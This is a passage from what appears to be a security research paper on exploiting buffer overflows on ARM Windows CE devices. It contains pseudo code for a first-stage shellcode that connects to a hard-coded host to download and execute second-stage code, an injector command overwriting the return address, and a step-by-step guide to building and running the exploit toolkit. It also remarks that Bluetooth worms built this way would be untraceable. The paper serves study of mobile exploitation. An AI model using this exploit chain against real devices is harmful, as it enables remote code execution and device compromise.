					</callout>
					<callout arearefs="additivedec.8">
						<para>Subtract the additive from the
instruction.</para>
					</callout>
					<callout arearefs="additivedec.9">
						<para>Save the real instruction from r1 into the
location pointed to by r3, then add 4 to r3 to obtain the next instruction
address.</para>
					</callout>
					<callout arearefs="additivedec.10">
						<para>Compare r4 to r2. While the same effect
could have been obtained with cmp r4, r2, the resulting encoding contains
a large number of \0 characters which would be detrimental to the
decoder's purpose.</para>
					</callout>
					<callout arearefs="additivedec.11">
						<para>Loop if all the instructions have not been
decoded.</para>
					</callout>
					<callout arearefs="additivedec.12">
						<para>Re-drain the  write buffer. This is done as
the decoder updates data on the data bus, however it will be executed from
the instruction bus.</para>
					</callout>
					<callout arearefs="additivedec.13">
						<para>Jump to the decoded shellcode.</para>
					</callout>
				</calloutlist>
			</programlistingco>
		</figure>

		<para>
The complete additive decode function shown in
<xref linkend="additivedec"/> links together all the previous issues
providing an initial bootstrap for the first stage shellcode.
		</para>

		</sect3>
	</sect2>

	<sect2>
		<title>Stage One</title>
		<para>
When the exploit is injected into the vulnerable process, it triggers the
first stage shellcode. As the amount of code space in the exploit is
minimal, the goal of the first stage is to download supplemental code from
a location and place it on the heap, where it will be executed. The code
is not placed on the stack as function calls may destroy it.
		</para>

		<para>
The location and protocol that the second stage shellcode is downloaded
from can be altered. In the example first stage, the
<structname>sockaddr_in</structname> is hard coded to 192.168.1.100 port
2048. When running this exploit on a different network, it will be
necessary to alter this address. The shellcode uses TCP/IP to to obtain
the second stage, however this could easily be altered to use UDP/IP if
required. Another possibility is Bluetooth. This would allow for the
creation of Bluetooth worms, which would be untraceable to the creator.
Currently the most common Bluetooth stack manufacturer, WIDCOMM, does not
publicly distribute the API and therefore a Bluetooth executable would
need to be disassembled to obtain the correct function calls. In WCE .NET,
Microsoft have developed an open Bluetooth stack. Despite this, many PDA
manufacturers are still deploying the WIDCOMM stack in preference.
		</para>

		<figure id="stage1pseudo">
			<title>Stage 1 Pseudo Code</title>
			<programlisting>
struct sockaddr_in sin = { AF_INET, 2048, 0xc0a80005};
void stage1(void)
{
	uint8_t *buf;
	uint32_t buf_sz, buf_len;
	int sock, i;

	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sock &lt; 0) goto error;

	if(connect(sock, &amp;sin, sizeof(sin)) &lt; 0)
		goto error;

	buf_sz = buf_len = 0;
	while (1) {
		if (buf_len &lt; buf_sz)
			goto do_recv;

		buf = (uint8_t*)realloc(buf, buf_sz+0x1000);
		if (0 == buf) goto error;

		do_recv:
		i = recv(sock, buf+buf_len, buf_sz-buf_len);
		switch(i) {
		case -1:
			goto error;
		case 0:
			pc = buf;
		default:
			buf_sz += i;
			break;
		}
	}

	flush_buffers();
	(void*)((*)buf)();

	error:
		goto error;
}
			</programlisting>
		</figure>

		<para>
<xref linkend="stage1pseudo"/> shows the pseudo code for the stage 1
shellcode. This shellcode is optimised for size. A smaller first stage
means that it will be usable in more situations. It can also be seen that
currently, when an error occurs, the code enters an eternal loop. This
loop will consume a large amount of CPU and will usually force the owner
to reboot the device, thus providing another opportunity for exploitation.
		</para>

		<para>
While testing, it was found that on WCE 2003, if the
<function>WSAStartup</function> function was called more than once, the
calling thread was killed. However, WCE 2002 does not suffer from this bug.
		</para>
	</sect2>

	<sect2>
		<title>Stage Two</title>
		<para>
The second stage shellcode can be much more complex than the first. It can
be almost unlimited in size and produced easily by a compiler then
extracted from an executable. However in this case, the second stage will
simply be a message box indicating that the shellcode has been executed
correctly and will then terminate the process.
		</para>

		<figure id="stage2pseudo">
			<title>Stage 2 Pseudo Code</title>
			<programlisting>
void stage2(void)
{
	HANDLE h;
	MessageBox(0, L"0wn3d", 0, MB_OK);
	h = GetOwnerProcess();
	TerminateProcess(h, 0);
}
			</programlisting>
		</figure>
	</sect2>
</sect1>


<sect1>
	<title>Obtaining the Buffer Address</title>

	<para>
A large part of the exploitation process is obtaining the address of the
buffer that is going to be exploited. This is important as it defines the
jump address that must overwrite the return address. It also provides an
approximate size of the overrun value.
	</para>

	<para>
In the case of the example server included in the accompanying source, the
buffer address is easily obtained. The source can be edited to display the
address of the character array or a breakpoint can be set in MVC++ at which
point the thread variables can be examined. The example code buffer
starts at 0x0002fa60. A slot 0 address is specified so the exploit will
succeed when running in any process slot.
	</para>

	<para>
In other executables, the debug information or source may not be
available, so the <productname>Visual C++</productname> debugger must be
used. Version 3.0 is not able to attach to processes and so must run the
executable from start time. To do this, the executable must be downloaded
onto the host PC running <productname>ActiveSync</productname>. Create a
new project in Visual C++, and import the executable. Alter the project
settings so that when Visual C++ uploads the executable onto the device,
it overwrites the old version. This will allow the debugger to run the
executable. To find the buffer start address, a known string can be sent
as an identifier, which can be searched for in memory. When the executable
crashes, the debugger will close and it will not be able to access the
device's memory. <productname>Visual C++</productname> 4 and above allow
the user to attach to a process. Use this version if possible, although it
will depend on the version of WCE being used.
	</para>

	<para>
The process of finding the buffer address can be helped by other software
such as IDA Pro, which is able to disassemble an executable. The execution
path can then be traced back from system calls to
<function>recv</function>, <function>memcpy</function> or others.
	</para>

	<para>
A further development on the process of finding the buffer start address
is to use a JTAG which can talk directly to GDB or the Visual C++
debugger. This device is able to halt the CPU and step through
instructions at a hardware level, eliminating the requirement for a
debugger on the host device and ActiveSync. However, it is likely that
access to the JTAG signal connections will require invasive alterations to
the host device. Although manufacturers do not advertise the JTAG pin
connections, several people have reverse engineered various hardware
devices to find them. Examples of JTAG connectors and debuggers can be
seen in <xref linkend="appendix_hw"/>.
	</para>
</sect1>


<sect1>
	<title>The Final Exploit</title>

	<sect2>
		<title>Test devices</title>
		<para>
The code and exploits detailed within this paper were all tested and
executed on an HP iPAQ 5450 running <productname>Windows CE
3.0</productname> (Windows Mobile 2002). Software was compiled using
<productname>Microsoft eMbedded Visual C++ 3.0</productname> (which is
available freely from Microsoft) and the GNU Binutils package. Please
refer to <xref linkend="appendix_sw"/> for the location of all software
downloads.
		</para>
	</sect2>

	<sect2>
		<title>The Injector</title>
		<para>
The exploit is run through the <command>inject</command> command. Before
executing the injector, the correct decoder and first stage shellcode are
defined. By default <filename>inject.c</filename> contains the assembled
opcodes from <filename>additive.s</filename> and
<filename>stage1.s</filename>. The injector also needs to know which
instruction is the ADR opcode to calculate the correct offset. Finally the
additive value must be specified for the injector to encode the first
stage shellcode.
		</para>

		<para>
When the injector is run, the target address, port, jump address and
buffer size must be specified. The injector ensures the jump address is
correctly aligned by padding if necessary. Following the padding, the
decoder and first stage shellcode is sent. Finally the injector sends the
jump address multiple times, until the number of bytes sent equals the
buffer size. The buffer size specified should be larger than the buffer
being overflowed so that the return address can be altered. In some cases,
depending on the compiler and function complexity, the stack pointer may
not be overwritten, however the decoder will fix the stack when it is
executed.
		</para>

		<para>
For the exploitable server in the toolkit, the following command will
inject the exploit correctly.
		</para>

		<para>
<command>./inject -j 0x0002fa60 -s 1200 -a 192.168.1.101 -p 4000</command>
		</para>

		<para>
The injector works by overwriting the return address stored on the stack.
When returning, a function removes all local variables from the stack
before calling <quote>ldmia sp, {sp, pc}</quote> or
<quote>ldmia sp, {pc}</quote>. This loads the address inserted by the
injector into the PC, and therefore allows the shellcode to take control
of the device.
		</para>
	</sect2>

	<sect2>
		<title>Running the Exploit</title>
		<para>
Having assembled all the shellcode using the <filename>Makefile</filename>
provided, three files of importance will be generated. Firstly,
<filename>stage1.txt</filename> which is the first stage shellcode in an
array format. This is for direct inclusion into the injector. Secondly,
<filename>stage2.bin</filename> which is the second stage binary used by
the shellcode server. This will be downloaded by the first stage when
running. Finally, <filename>e954</filename> which generates the additive
for use with the first stage shellcode. The list below indicated a
step-by-step guide to using the toolkit.
		</para>

	<orderedlist>
		<listitem><para>
In the <filename>shellcode</filename> directory, assemble the shellcode:
<command>make</command>
		</para></listitem>
		<listitem><para>
In the <filename>shellcode_server</filename> directory, build the server:
<command>make</command>
		</para></listitem>
		<listitem><para>
Run the shellcode server:
<command>./shellcode_server -f ../shellcode/stage2.bin</command>
		</para></listitem>
		<listitem><para>
Open the project located in the <filename>server</filename> directory
using <productname>Embedded Visual C++</productname> and build the
executable. If <productname>ActiveSync</productname> is running, the
resulting executable will be uploaded to the target device, else
it will need to be copied over by hand.
		</para></listitem>
		<listitem><para>
Run the <command>server</command> executable on the WCE device. If the
executable was copied over by <productname>Embedded Visual
C++</productname>, an icon will appear on the start menu.
		</para></listitem>
		<listitem><para>
Use <filename>e954</filename> to generate the correct additive value.
<command>./e954 stage1.bin</command>
		</para></listitem>
		<listitem><para>
In the <filename>inject</filename> directory, ensure that
<filename>inject.c</filename> has the correct additive, first stage and
decoder shellcode then build the executable: <command>make</command>
		</para></listitem>
		<listitem><para>
Execute the injector with the appropriate command line arguments. An
example of this is: <command>./inject -j 0x0002fa60 -s 1200 -a
192.168.1.101</command>.
		</para></listitem>
	</orderedlist>

		<para>
When the exploit is injected, the WCE device will display a message box
with the string <quote>0wn3d</quote> in it. If nothing is displayed and
the device hangs, it is possible that the exploit failed.
		</para>
	</sect2>

	<figure id="wincedisplay">
		<title>Windows CE Display Running the Exploit</title>
		<mediaobject>
			<imageobject>
				<imagedata align="center" fileref="images/wince_display.jpg" format="JPEG"/>
			</imageobject>
		</mediaobject>
	</figure>

	<sect2>
		<title>Common Problems</title>
		<para>
When the exploit does not succeed, the device may hang. There are several
common causes for this. The checklist below will help to diagnose any
problems.
		</para>

		<itemizedlist>
			<listitem><para>Confirm that the exploitable server is running
on the target device.</para></listitem>
			<listitem><para>Ensure the shellcode server is running and is
reading from the correct <filename>.bin</filename> file.</para></listitem>
			<listitem><para>Check that the host and port in the first stage
shellcode are specified correctly. This defaults to
192.168.1.100:2048.</para></listitem>
			<listitem><para>Ensure that the shellcode server is reachable
from the device being exploited. Firewalls are a common cause of the
device not being able to contact the server. Also check the shellcode
server is listening on the correct port. By default the server listens on
0.0.0.0:2048.</para></listitem>
			<listitem><para>Confirm that the address being used by the
injector is actually where the shellcode is being
placed in memory.</para></listitem>
			<listitem><para>Ensure the shellcode injector is sending the
correct version of the decoder and first stage shellcode. Also confirm
that the jump instruction is correctly defined.</para></listitem>
		</itemizedlist>
	</sect2>
</sect1>

<sect1>
	<title>Further Research</title>
	<para>
During the course of developing the shellcode for this paper, some further
research ideas were highlighted. Firstly, all instructions are 32 bits in
length since ARM is a 32 bit RISC processor. This causes the shellcode to
be much larger than similar shellcode for a CISC processor. The ARM
processor offers a method to reduce the shellcode size significantly,
through the use of the Thumb instruction. The Thumb instruction set
encodes each instruction into 16 bits rather than 32 bits. While the WCE
libraries will not operate with Thumb code, it does offer a way to reduce
the size of the symbol locator and decoder. When the main body of the
shellcode is reached, the processor could switch out of Thumb mode to call
WCE library functions.
	</para>

	<para>
Secondly, it was found that the Microsoft eMbedded Visual C++ debugger was
lacking in many areas, causing it to crash frequently. Using a JTAG, it
should be possible to find overflows or debug shellcode using GDB in a
much more reliable manner. Some JTAG devices will also operate with
Microsoft eMbedded Visual C++, although it is not know how reliable this
method is.
	</para>
</sect1>


<appendix id="appendix_doc">
	<title>Further Reading</title>
	<itemizedlist>
		<listitem><para><productname>The Shellcoder's Handbook</productname>. ISBN 0764544683</para></listitem>
		<listitem><para><ulink url='http://www.insecure.org/stf/smashstack.txt'>Smashing the Stack for Fun and Profit.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.intel.com/design/intelxscale/273473.htm'>Intel XScale Core Developer's Manual.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.arm.com/pdfs/QRC0001H_rvct_v2.1_arm.pdf'>Arm Instruction Set Quick Reference Card.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.arm.com/miscPDFs/8031.pdf'>Procedure Call Standard for the ARM Architecture.</ulink></para></listitem>
		<listitem><para><ulink url='http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wcecoreos5/html/wce50conMemoryArchitecture.asp'>The Microsoft Windows CE Memory Architecture.</ulink></para></listitem>
		<listitem><para><ulink url='http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wcechp40/html/_armcall_arm_calling_standard.asp'>The Windows CE ACPS.</ulink></para></listitem>
	</itemizedlist>
</appendix>
<appendix id="appendix_sw">
	<title>Software</title>
	<itemizedlist>
		<listitem><para><ulink url='ftp://ftp.gnu.org/pub/gnu/binutils/'>GNU Binutils.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.microsoft.com/downloads/details.aspx?FamilyID=d2645c21-8a85-45a2-8d13-653beb6cdddc&amp;DisplayLang=en'>Microsoft ActiveSync 3.8.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.microsoft.com/downloads/details.aspx?FamilyID=f663bf48-31ee-4cbe-aac5-0affd5fb27dd&amp;DisplayLang=en'>Microsoft eMbedded Visual Tools 3.0 (2002 Edition)</ulink></para></listitem>
		<listitem><para><ulink url='http://www.windowsembeddedkit.com/RegPage.aspx'>Microsoft Windows CE 5.0 Source Download</ulink></para></listitem>
	</itemizedlist>
</appendix>
<appendix id="appendix_hw">
	<title>Hardware</title>
	<itemizedlist>
		<listitem><para><ulink url='http://evilg.home.t-link.de/jtag-howto/'>HP5450 JTAG HowTo.</ulink></para></listitem>
		<listitem><para><ulink url='http://wiki.xda-developers.com/index.php?pagename=WallabyJTAG'>O2 XDA JTAG.</ulink></para></listitem>
		<listitem><para><ulink url='http://www.epitools.com/products/probes.php'>EPI Majic LX.</ulink></para></listitem>
	</itemizedlist>
</appendix>
</article>


